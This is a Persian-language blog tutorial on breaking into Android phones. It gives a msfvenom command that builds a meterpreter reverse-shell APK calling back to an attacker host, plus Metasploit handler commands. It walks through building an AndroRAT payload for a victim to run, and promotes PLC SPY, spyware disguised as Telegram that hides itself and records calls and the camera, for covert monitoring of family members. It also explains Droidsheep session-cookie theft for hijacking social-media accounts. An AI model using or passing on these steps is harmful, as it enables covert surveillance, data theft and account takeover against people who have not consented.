نفوذ به اندروید چگونه ممکن است؟

برنامه های هک گوشی
برنامه های هک گوشی دنیا را بشناسید
می 7, 2019
هک وب کم
هک شدن وب کم را چگونه و با چه روش هایی تشخیص دهیم؟
می 10, 2019

نفوذ به اندروید چگونه ممکن است؟

نفوذ به اندروید

آیا هک کردن و نفوذ به اندروید امکان پذیر است ؟ چگونه می توان سیستم عامل اندروید را هک کرد ؟ امنیت سیستم عامل اندروید چه قدر است ؟ این ها همه سوالاتی هستند که در ذهن بسیاری از کاربران اندروید ایجاد می شود. هرکدام از ما هنگام خرید گوشی هوشمند توقع داریم که گوشی موردنظرمان از امنیت بالایی برخوردار باشد چرا که هنگام استفاده از گوشی موبایل معمولا اطلاعات شخصی و مهم خود را در آن ذخیره می کنیم. این که هر سیستم عاملی چه قدر امنیت دارد را نمی توانیم در یک مطلب بگوییم، اما امروز در این مطلب قصد داریم درباره روش های هک و نفوذ به اندروید به طور مفصل صحبت کنیم و به نقد و بررسی آنها بپردازیم.

هک و نفوذ به اندروید چگونه ممکن است ؟

در همین ابتدا، بدون اینکه بخواهیم شما را گیج کنیم، باید بگوییم تمام دستگاهای الکترونیکی قابل هک شدن هستند و دستگاه های اندرویدی نیز از این قاعده مستثنی نیستند. روش های هک گوشی اندروید بسیار متنوع و زیاد است تا جایی که حتی افرادی که دانش چندانی در زمینه برنامه نویسی و هک ندارند، باز هم میتوانند گوشی های اندروید را با چند راهکار ساده هک کنند. این دستگاهای اندرویدی مانند اکثر ابزارهای الکترونیکی قابلیت هک شدن را دارند اما روش های هک آن گوناگون بوده و هر کس با توجه به توانایی های خود می تواند یک روش خاص را انتخاب نماید. هر روشی نیز به ابزاری خاص نیازمند است، که این ابزارها میزان دسترسی و کیفیت هک شما را مشخص می کنند.

انواع روش های نفوذ به اندروید

همانطور که گفتیم روش های آموزش هک و نفوذ به اندروید بسیار زیاد و متنوع هستند و هکرهای حرفه ای به خوبی با این روش ها آشنایی دارند. چنانچه قصد شما از یادگیری هک سیستم عامل اندروید تبدیل شدن به یک هکر حرفه ای می باشد، باید بدانید که قبل از هر چیز نیازمند یادگیری زبان های برنامه نویسی هستید، که البته این کار اصلا ساده نیست و احتیاج به گذاشتن زمان زیادی دارد. اما اگر هدف شما از یادگیری آموزش هک اندروید ، هک کردن گوشی اعضای خانوادتان به جهت کنترل و نظارت بهتر بر آنهاست، پیشنهاد می کنیم در ادامه مطلب همراه ما باشید تا با روش های سریع هک گوشی اندرویدی آشنا شوید.

شاخص ترین روش و ابزاری که یک هکر می تواند برای نفوذ به اندروید از آن استفاده کند، یک سیستم کامپیوتری مجهز به سیستم عامل لینوکس می باشد که از نسخه کالی لینوکس یا بکترک استفاده کند. خبر بد برای دارندگان گوشی های اندروید این است که سیستم عامل اندروید نیز بر اساس هسته سیستم عامل لینوکس طراحی شده است و همین عامل سبب می شود پروسه هک اندروید بسیار ساده تر برای یک هکر حرفه ای صورت پذیرد.

نفوذ به اندروید با سیستم عامل لینوکس

برای اینکه بتوان  اقدام به هک و نفوذ به اندروید کرد باید نسخه کالی لینوکس را روی سیستم خود داشته باشید. پس از آن با استفاده از ترمینال محبوب لینوکس اقدام به فراخوانی برنامه msfvenom می کند. با استفاده از این ابزار، هکر اقدام به ساخت یک برنامه هک اندروید به صورت APK می نماید. برای ساخت چنین ابزاری هکر تنها نیاز دارد که دستور زیر را در محیط ترمینال لینوکس وارد نماید.

<msfvenom -p android/meterpreter/reverse_tcp LHOST=(attacker-ip-address) LPORT=(port-to-receive-connection).<Name.apk<==

در دستور فوق هکر به جای عبارت LHOST می تواند از آدرس آی پی خودش و در قسمت LPORT از پورت اینترنت خودش استفاده کند. Name.apk نام ابزاری است که هکر آن را می سازد تا با آن اقدام به هک اندروید نماید.

سپس با انجام دادن راهکارهای بالا به ترتیب انجام دهید :

  • Msf>use exploit/multi/handler
  • Msf>set PAYLOAD android/meterpreter/reverse_tcp
  • Msf>set LHOST 192.168.1.35
  • Msf>set LPORT 443

البته این بار در قسمت LHOST نیاز است که آدرس سرور را وارد کند. این کار با استفاده از دستور ipconfig در محیط ترمینال انجام میشود و شما به خواسته خود رسیده اید.

نفوذ به اندروید

حالا وقتی که هدف شما بر روی برنامه ای که هکر با عنوان Name.apk ساخته کلیک کند و آن را اجرا کند، عملیات هک با کالی لینوکس موفقیت آمیز انجام می شود. همانطور که می بینید در این روش هک نیاز چندانی به دانش برنامه نویسی نیست و تنها از طریق دنبال کردن یک سری قواعد و دستورات هر شخصی قادر خواهد بود با استفاده از یک سیستم عامل کالی لینوکس اقدام به هک اندروید نماید.

هک گوشی اندرویدی از طریق بلوتوث

بلوتوث یکی از فناوری های بسیار کاربردی است که سال هاست در تلفن های همراه قرار داده شده است. در گذشته از بلوتوث برای انتقال فایل استفاده می شد اما امروزه از این فناوری بیشتر برای اتصال دستگاه های همجوار و گجت ها به تلفن همراه استفاده می شود. بلوتوث به همان اندازه که کاربردی است به همان اندازه نیز ناامن است. حملات مبتنی بر بلوتوث آنقدر زیاد هستند که خود دسته بندی های مختلفی را شامل می شوند و اخیرا یک روش خاص برای هک از طریق بلوتوث نیز کشف شده است.

  • Bluejacking: حمله ای که در آن حمله کننده فقط می تواند تعداد بی شمار درخواست به گوشی شما ارسال کند و در نقش اسپم ظاهر شود.
  • Bluesnarfing: در این حمله هکر با استفاده از نرم افزارهای خاص از Bluetooth OBEX به اطلاعاتی از دستگاه شما می تواند دسترسی پیدا کند.
  • Bluebugging: حمله ای خطرناک که امروزه اکثر دستگاه های تلفن همراه به روش مقابله با آن مجهز شده اند. در این حمله هکر می تواند کنترل همه یا قسمتی از گوشی را بدست بگیرد.

هک از طریق بلوتوث مختص به سیستم عامل اندروید نیست و تمام سیستم عامل ها در معرض این خطر قرار دارند.

هک و نفوذ به اندروید با استفاده از بدافزار

یکی از راه های ساده، سریع و کارآمد برای هک گوشی دیگران، استفاده از بدافزار است. بدافزاری که در اینجا از آن صحبت می کنیم برنامه ای است که به هر طریقی روی گوشی موبایل فرد قربانی نصب شده و پس از آن اقدام به جاسوسی اطلاعات گوشی و ارسال آن برای هکر می کند. این برنامه ها می توانند خاص منظوره یا همه منظوره طراحی شوند. برنامه های خاص منظوره می توانند فقط برای هک اطلاعات برنامه ای خاص از گوشی، همچون هک تلگرام به کار برده شوند و برنامه های همه منظوره می توانند برای هک کل دستگاه تلفن همراه به کار روند و تمام اطلاعات گوشی را برای هکر ارسال کنند.

در ادامه تعدادی از این برنامه ها را معرفی و روش کار با آن ها را توضیح خواهیم داد. این برنامه ها معمولا توسط هکرهای حرفه ای ساخته می شوند و هکرهای غیرحرفه ای و حتی افراد عادی نیز از آنها برای هک گوشی شخص موردنظرشان استفاده می کنند. تعداد این برنامه ها آنقدر زیاد است که انسان در انتخاب یکی از آن ها ممکن است حتی گیج شود. البته این نرم افزار ها برای اجرا و درست کار کردن نیازمند الزاماتی می باشند که بعضا به سادگی در اختیار همه قرار نمی گیرند.

نفوذ به اندروید با برنامه cSploit

برنامه cSploit یکی از بهترین برنامه های هک گوشی اندرویدی در دنیا می باشد. سازندگان این اپلیکیشن مدعی هستند که این برنامه از نظر کارایی و قابلیت غنی ترین اپلیکیشن هک گوشی در سیستم عامل اندروید است. این برنامه از قابلیت هایی همچون سرشماری و ارائه اطلاعات هاست های محلی، پیدا کردن متغیرها، پیدا کردن رمز وای فای و تغییر آن، نصب بک دور و غیره پشتیبانی به عمل می‌آورد. پس اگر می‌خواهید به یک برنامه هک گوشی اندرویدی غنی و کاربردی دسترسی پیدا کنید، اپلیکیشن cSploit را فراموش نکنید.

نفوذ به اندروید با برنامه AndrodRAT

برنامه AndroRAT یکی از محبوب ترین و معروف ترین برنامه های هک گوشی  اندرویدی می باشد که رایگان بوده و می تواند با هک گوشی فرد مقابل از راه دور، اقدام به ارسال Sms ، مخاطبین و حتی موقعیت فرد قربانی کند. این برنامه حتی قادر است با استفاده از دوربین جلو یا پشت گوشی، بدون اینکه قربانی متوجه چیزی شود، اقدام به تصویر برداری نماید.

نفوذ به اندروید

بخشی از نام این برنامه که با عبارت RAT مشخص شده، مخفف Remote Administrative Tool به معنای “ابزار کنترل کننده از راه دور” است. این برنامه به طور خودکار بعد از اینکه گوشی فرد موردنظر روشن شود راه اندازی خواهد شد. بنابراین اگر به دنبال یک برنامه هک گوشی رایگان و کاربردی هستید، برنامه AndroidRAT یکی از بهترین گزینه های موجود است.

آموزش کار با نرم افزار AndroRat

قبل از هر چیز باید این نکته را متذکر شویم که این گونه آموزش ها صرفا برای آموزش نحوه کار برنامه های هک در سایت قرار گرفته تا علاقه مندان به بحث امنیت بتوانند با استفاده از آن به آسیب پذیری های موجود در سیستم عامل اندروید پی برده و نسبت به رفع این آسیب پذیری ها اقدام نمایند.

در اولین مرحله ما نیاز به مکانی در اینترنت داریم تا اطلاعات بدست آمده از نرم افزار AndroRat به آنجا ارسال شود. برای این منظور ابتدا وارد سایت noip.com شده و یک هاست با نام دلخواه ایجاد می کنیم.

اکنون باید عملیات مربوط به انتقال پورت را انجام دهیم. عملیات انتقال پورت برای هر مودم به نحوی خاص انجام پذیر است. پس برای انجام عمل انتقال پورت بهتر است نوع مودم خود را در گوگل جستجو کرده و سپس نحوه انتقال پورت در آن را بدست بیاورید.

در این مرحله نرم افزار AndroRat Blinder را دانلود کرده و سپس در قسمت Hostname نام هاستی را که ساخته اید و در قسمت Port نام پورت مربوطه را وارد نمایید. حال برای فایل مربوطه یک نام انتخاب کرده و روی Go کلیک نمایید.

حال باید نرم افزار DUC که برای آپدیت خودکار DNS در ویندوز به کار گرفته می شود را دانلود و نصب نمایید. پس از نصب برنامه DUC آن را باز کرده و مشخصات هاستی که ساخته بودید را در قسمت مربوطه وارد کنید.

اکنون نرم افزار AndroRat Project را دانلود و نصب نموده و بعد از آن تب Server را باز کنید و در آنجا شماره پورتی که قبلا ایجاد کرده اید را وارد نمایید.

سپس فایل apk را که مراحل قبل توسط برنامه AndroRat Blinder ایجاد کرده بودید را روی موبایل هدف اجرا کنید.

بعد از انجام مراحل بالا تقریبا شما موفق به ساخت یک برنامه هک گوشی اندروید شده اید. البته باید بدانید که اکثر آنتی ویروس ها به سبب مشهور بودن برنامه AndroRat در فرایند هک و نفوذ، این نرم افزار را بعنوان ویروس شناخته و اجازه دسترسی به آن را نمی دهند.

برنامه کنترل و هک PLC SPY

PLC یکی دیگر از برنامه هایی است که می تواند کار کنترل و هک گوشی شخص موردنظر شما را انجام دهد. این برنامه با هدف نظارت بر فرزندان در فضای مجازی توسط سامانه کنترل فرزند طراحی و ساخته شده است.

هک اندروید

PLC SPY در دو نسخه بدون دسترسی ( هک با شماره تلفن ) و با دسترسی ارائه می شود. که البته نسخه جدید این برنامه نیز با نام PLC PLUS منتشر شده که شما می توانید آن را با آیکون دلخواهتان مثلا تلگرام بدون فیلترشکن برای فرزندتان ارسال کنید، به محض کلیک فرزند برروی لینک ارسالی شما، برنامه به طور خودکار نصب می شود و سپس از لیست نرم افزارها پنهان می شود. قابلیت های منحصر به فردی که این نسخه ارائه داده است، شنود و ضبط مکالمات فرزند و مشاهده تصاویر اطراف توسط دوربین گوشی فرزند می باشد.

برای دانلود و یا کسب اطلاعات بیشتر درباره این برنامه می توانید برروی لینک قرمز رنگ زیر کلیک نمایید.

هک با شماره موبایل با نرم افزار PLC SPY

برنامه هک و نفوذ به اندروید zAnti

این برنامه، محصول شرکت Zimperium بوده و در حقیقت یک ابزار تست نفوذ و امنیت شبکه می باشد. اما از آنجا که از اینگونه برنامه ها هم می توان استفاده مفید و هم می توان استفاده سوء انجام داد،‌ علاوه بر کارشناسان امنیت، هکرها نیز به این برنامه علاقه مند می باشند. امکانات بی شمار و همچنین سادگی کار با این برنامه، بطوری که نیاز به دانش برنامه نویسی چندانی برای کار با zanti نمی باشد، باعث شده است برنامه zAnti یک برنامه محبوب برای هکرها و بخصوص هکرهای مبتدی باشد.

طریقه نصب برنامه zanti

برای کار با این برنامه ابتدا از طریق لینک بالا اقدام به دانلود zAnti نموده و پس از دانلود، اقدام به نصب برنامه و ورود به صفحه اولیه آن نمایید. در اولین صفحه یک سری شرایط و قوانین کار با برنامه ذکر شده است که باید گزینه قبول شرایط را تیک زده و سپس Start now را کلیک نمایید.

پس از گذشتن از آموزش های اولیه نرم افزار ، در صفحه آخر، تیک گزینه I am fully را زده و سپس گزینه finish را انتخاب نمایید. دقت داشته باشید که در مرحله نصب اولیه، نیاز است که تلفن همراه شما به اینترنت متصل باشد.

پس از اتمام مراحل نصب، نرم افزار شروع به اسکن شبکه ی وای فایی که به آن متصل هستید نموده و پس از اتمام گزینه don’t ask again را تیک زده و سپس گزینه no thanks را انتخاب نمایید. در این مرحله تمام سیستم هایی که به شبکه وای فای مورد نظر متصل هستند، نمایش داده می شود.

برنامه Droidsheep 

یکی از برنامه های هک شبکه وایرلس و نفوذ به اکانت شبکه های اجتماعی نظیر فیسبوک و اینستاگرام، برنامه Droidsheep می باشد. این برنامه برای شناسایی نقاط ضعف و آسیب پذیری های شبکه طراحی و ساخته شده است و امکانات بی نظیری برای شناسایی آسیب پذیری ها و تهدیدات شبکه، در اختیار کارشناسان امنیت قرار می دهد. اما از آنجا که برنامه های تست نفوذ و شناسایی نقاط ضعف، همچون چاقویی دولبه عمل می کنند، گاهی هکرها نیز از این برنامه ها برای استفاده در مقاصد خودشان استفاده می نمایند.

آموزش کار با برنامه Droidsheep

تمام ابزاری که از شبکه وایرلس برای انتقال داده استفاده می کنند، اطلاعاتی را در فضا انتشار می دهند. منتها چون این اطلاعات برای مقصد خاصی ارسال می شوند، معمولا بقیه دستگاه ها از گرفتن آن خودداری کرده و فقط مقصد آن را دریافت می کند. اما برنامه Droidsheep اینگونه نیست و تقریبا تمامی اطلاعات موجود در شبکه ای که به آن متصل است را دریافت می کند. سپس این اطلاعات دریافت شده را طبقه بندی کرده و اقدام به دریافت کدهای Session می کند. سپس از این کدها که در حقیقت کلید ارتباط بین دستگاه هک شده و سایت مورد نظرش می باشد، برای ارتباط با آن سایت استفاده می کند. Droidsheep در واقع کلید های نشست را سرقت کرده و از آن کلیدها برای ارتباط خودش با وبسایت ها استفاده می کند.

 

پس از اینکه Droidsheep کلیدهای نشست را سرقت کرد، از آن برای اتصال به وبسایت مورد نظر استفاده کرده و خود را به جای کاربر اصلی جا می زند. درویدشیپ با استفاده از این شیوه، قادر خواهد بود اکانت های شبکه های اجتماعی و تقریبا تمامی وبسایت ها را هک نماید.

بازدیدها: 278

دیدگاهتان را بنویسید